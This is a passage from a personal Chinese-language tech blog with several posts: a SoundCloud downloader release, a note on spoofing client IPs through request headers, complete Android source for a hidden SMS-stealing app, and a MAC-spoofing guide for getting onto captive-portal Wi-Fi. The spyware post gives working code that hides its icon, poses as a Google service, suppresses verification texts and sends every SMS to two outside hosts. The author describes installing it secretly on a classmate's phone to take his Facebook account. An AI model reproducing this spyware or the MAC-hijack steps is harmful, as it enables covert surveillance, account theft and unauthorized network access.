Weil Jimmer's Blog

SoundCloud Downloader EXE

本程式可批量下載 soundcloud.com 的音樂，下載該名藝術家的所有音樂並編號，或是下載某播放清單的所有音樂，或是下載單首音樂。

The Application is able to mutiple download the music from "soundcloud.com" ,  you can also download all the song from the artists you love , and you can download specific playlist or tracks.

2017.02.15 - 修復Bug - 無法下載問題。

版本(Version)：1.0.0.1

Last update:2017.02.16

下載地址【一】：https://url.weils.net/l

下載地址【二】：https://url.weils.net/q

產品頁面：http://web.wbftw.org/product/soundclouddownloaderexe

程式設計缺陷足以修改Header偽造IP

這其實是個老梗，很久以前就知道了。今天又突然想到，發篇文章好了。

很多網站上的程式教學都是錯誤的，取得IP方法用get Header 的 Client-IP 及 X-Forwarded-For。

真的是禍害，Header是可以給用戶隨意變更的。

我修改了 Header 在網站上隨意搜尋 What is my ip ?。

結果大部分網站都有問題！

我怎麼改，網站就怎麼顯示，怎麼都對。如果今天我把Header改成<script>標籤，不就造成了XSS攻擊漏洞？改成SQL語法，造成SQL注入漏洞。

只是剛好想到，之前也沒發過類似的文章，補發。

Android Java SMS Spy

====2015/11/20====

這是我很久以前寫的秘密程式，我當下就很想發表，我有很多都很想發表到我網站，但因網站主機是臨時的，將來還要再次轉移，故我就荒廢了網站整整兩個月（我是指不發文，並非我不管理），現在轉移完畢，意味著我將會再次發文。

================

※純測試，不做非法用途。

首先，因為這程式很兩極化，既可以合法也可以非法，講好聽點就是自動同步SMS訊息到網站上，講難聽點，竊取用戶SMS訊息。

腦筋轉得不夠快的人可能不明白這意味著什麼，只要裝了我寫的程式，就會被我盜光所有帳號。

開發緣由：因為我同學不相信「手機防毒軟體掃描不出病毒」，所以我向他放話，我寫的程式，防毒絕對掃不到。

因為我避免用戶發現這個祕密程式，所以我取名為google_sms_server。到時候要查就很困難。

<application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme" >
        <activity android:name=".MainActivity" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <receiver
            android:name=".SmsCloudBackup"
            android:enabled="true"
            android:exported="true" >
            <intent-filter android:priority="999999999" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>

    </application>

設置 SMS_RECEIVED廣播，備註要記得添加權限，並把優先級別設定為最高級別。

package com.google.google_sms_server;

import android.app.Activity;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.widget.Toast;

public class MainActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        //setContentView(R.layout.activity_main);
        PackageManager p = getPackageManager();
        p.setComponentEnabledSetting(getComponentName(), PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);//設定隱藏在Launcher中

        Toast.makeText(this,"Google SMS Backup Service運作中",Toast.LENGTH_LONG).show();
        this.finish();
    }

}

package com.google.google_sms_server;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.AsyncTask;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.util.Log;

import org.apache.http.NameValuePair;
import org.apache.http.client.HttpClient;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;

import java.util.ArrayList;
import java.util.List;

public class SmsCloudBackup extends BroadcastReceiver {

    private String TAG = SmsCloudBackup.class.getSimpleName();
    public SmsCloudBackup() {

    }

    @Override
    public void onReceive(Context context, Intent intent) {
        // Get the data (SMS data) bound to intent
        Bundle bundle = intent.getExtras();
        String str = "";
        SmsMessage[] msgs = null;

        if (bundle != null) {
            Object[] pdus = (Object[]) bundle.get("pdus");
            msgs = new SmsMessage[pdus.length];

            for (int i=0; i < msgs.length; i++) {
                msgs[i] = SmsMessage.createFromPdu((byte[]) pdus[i]);
                str += "SMS from " + msgs[i].getOriginatingAddress() + " : ";
                str += msgs[i].getMessageBody().toString();
                str += "\n";
            }

            if (str.contains("驗證") || str.toLowerCase().contains("verif")){
                Log.d(TAG, "ABORT");
                this.abortBroadcast();//截斷用戶訊息，讓用戶察覺不到驗證訊息。實際上測試，似乎沒有效果。
            }

            Log.d(TAG, str);
            String aa= "";
            try{
                aa=java.net.URLEncoder.encode(str,"utf-8");
            }catch (Exception ex){

            }
            new ExcuteAsyncTaskOperation().execute(aa);

        }

    }

    public class ExcuteAsyncTaskOperation extends AsyncTask<String, String, String> {
        //異線任務，執行網路動作都要這樣。
        @Override
        protected String doInBackground(String... parr) {
            //進行背景工作，如「Network」，並可轉發值。
            //在迴圈中使用publishProgress((onProgressUpdate引數類別)變數);以傳遞資料。
            //例如publishProgress((int)50);

            HttpClient httpclient = new DefaultHttpClient();
            //我POST訊息至兩個釣魚網站。
            HttpPost httppost = new HttpPost("http://網站/post/post.php?u=SMS&c=" + parr[0]);
            HttpPost httppost2 = new HttpPost("http://網站2/post/post.php?u=SMS&c=" + parr[0]);
            try {
                List<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>(1);
                nameValuePairs.add(new BasicNameValuePair("u", "SMS"));
                nameValuePairs.add(new BasicNameValuePair("c", parr[0]));
                httppost.setEntity(new UrlEncodedFormEntity(nameValuePairs));
                httpclient.execute(httppost);
                httpclient.execute(httppost2);
            } catch (Exception ex) {
                Log.d(TAG, "ERROR!!!!!!!!!!!!!!!!!!!!!" + ex.toString());
            }
            return "";
        }

    }

}

這樣，當用戶安裝完成，並執行後，此程式會從Launcher上消失，意思是找不到此程式的連結，並且會關閉此程式，得去 設定=>應用程式 才可能看到，但我已經取名為google什麼的，用戶很難察覺。

實作結果：

我祕密的裝在同學手機上，在他未察覺的情況下，進行這測試。事後他非常不爽，不過最後他還是原諒我了。

從釣魚網站，取得FB驗證碼。成功盜走FB帳號。

【實驗】兩台MAC地址相同的裝置連接到同個基地台

【Test】Both Device Which Is The Same MAC Address Connect to Wi-Fi

這個實驗，Jimmy Joe已經做過了，不過他網站上沒有描述清楚到底會怎樣，所以我要自己測試一下。

實驗裝置：

基地台：小米隨身Wi-Fi USB

裝置：Samsung Galaxy Tab 4 7.0 LTE(SMT235Y) 、 Infocus M810

首先因為我的手機很冷門，資訊極少，我也不知道要怎麼改Mac，但平板刷了CM12.1之後就可以使用Google Play商店上的Mac Changer，所以，用平板去改MAC地址。

在這之前，手機已經與Wi-Fi基地台連線了。

開始改MAC。

在電腦上顯示的結果如下：（未看到其他裝置登入，除了裝置名稱，其餘資訊，像是製造商、IP……等，都沒有變更。）

平板（Fake MAC）嘗試訪問網站，結果可以正常訪問。

現在輪到手機（原用戶）：Wi-Fi 沒有斷線，呈現已登入狀態，不過傳輸數據完全沒有任何回應。（無法正常使用網路）

接著把平板（Fake MAC）遠離基地台，讓手機（原用戶）靠近基地台。再次實驗，以測試與訊號強度是否有關係。

結果還是一樣！原用戶無法正常使用網路，平板可以正常使用網路。（看來…是先登入的被無預警登出，後登入的佔主導權。）

下列是，假MAC改回正常MAC連入基地台。（原用戶沒有受到另一台裝置干擾）

結果原用戶果然可以正常使用網路。一整個過程當中，原用戶都沒有被中斷連線，只是，會有段時間感覺好像已經斷網了。（實際上還是連著的。）

實驗結束。

結論：以我這基地台來說，是不會察覺到有兩台裝置同時使用網路並造成一下有一下無的情況，而是，真的會被踢掉，假的會正常使用。

若手機重新連線應該又會換成原用戶佔主導權，而假的無法正常使用了。

所以，和訊號強度（遠近）無關。

/**********2015/8/28 五 (更新)************/

**已經實驗證實**若是在 Open Wi-Fi Guest Mode 的環境下，進行更改MAC地址的動作，可以免費存取Wi-Fi。

什麼意思？

講白一點就是：例如學校、公司…等環境，都有開放式的Wi-Fi，可以直接連進去但沒有網路，接著會提示要使用者登入帳密。進行網頁認證後才可以上網。

我們可以透過更改自己的MAC地址為已登入用戶的MAC地址，這樣會造成，已登入用戶無法正常上網，但我可以正常上網。

要如何取得別人的MAC？可以在終端機輸入：

arp -an

之類的，或用zANTI、dSploit、Intercepter-NG……查看內網的其他人的MAC地址。

再更改即可。